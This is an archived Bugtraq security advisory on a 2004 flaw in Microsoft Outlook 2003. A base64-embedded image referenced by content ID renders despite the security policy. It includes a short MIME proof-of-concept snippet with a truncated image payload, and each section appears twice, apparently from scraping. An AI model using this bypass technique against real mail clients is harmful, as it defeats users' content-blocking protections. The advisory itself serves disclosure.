Microsoft Outlook 2003 Security Policy Bypass Vulnerability
BID:11446
Info
Microsoft Outlook 2003 Security Policy Bypass Vulnerability
| Bugtraq ID: | 11446 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 18 2004 12:00AM |
| Updated: | Oct 18 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to "[email protected]" <[email protected]>. |
| Vulnerable: |
Microsoft Outlook 2003 0 |
| Not Vulnerable: | |
Discussion
Microsoft Outlook 2003 Security Policy Bypass Vulnerability
Microsoft Outlook 2003 is reported prone to a security policy bypass vulnerability.
It is reported that by including a base64 encoded image in an email and labeling that image in a sufficient manner, it is then possible to reference this base64 encoded image.
This will result in a policy bypass because the image will be automatically rendered when the email is viewed in Outlook 2003. Although this issue is reported to affect Outlook 2003, other mail transfer agents may also be affected.
Microsoft Outlook 2003 is reported prone to a security policy bypass vulnerability.
It is reported that by including a base64 encoded image in an email and labeling that image in a sufficient manner, it is then possible to reference this base64 encoded image.
This will result in a policy bypass because the image will be automatically rendered when the email is viewed in Outlook 2003. Although this issue is reported to affect Outlook 2003, other mail transfer agents may also be affected.
Exploit / POC
Microsoft Outlook 2003 Security Policy Bypass Vulnerability
The following proof of concept is supplied by http-equiv:
<img src="cid:malware">
------=_NextPart_000_0004_01C4B234.2209FD20
Content-Type: image/gif;
name="youlickit[1].gif"
Content-Transfer-Encoding: base64
Content-ID: <malware>
R0lGODlhogCiAOb/AP////8hAP8QAP8AAPdCAPcAAO97AO8IAOfeQufWUuetY+eUA
N7OEN7OAN7G
The following proof of concept is supplied by http-equiv:
<img src="cid:malware">
------=_NextPart_000_0004_01C4B234.2209FD20
Content-Type: image/gif;
name="youlickit[1].gif"
Content-Transfer-Encoding: base64
Content-ID: <malware>
R0lGODlhogCiAOb/AP////8hAP8QAP8AAPdCAPcAAO97AO8IAOfeQufWUuetY+eUA
N7OEN7OAN7G
Solution / Fix
Microsoft Outlook 2003 Security Policy Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Outlook 2003 Security Policy Bypass Vulnerability
References:
References:
- Technet Security (Microsoft)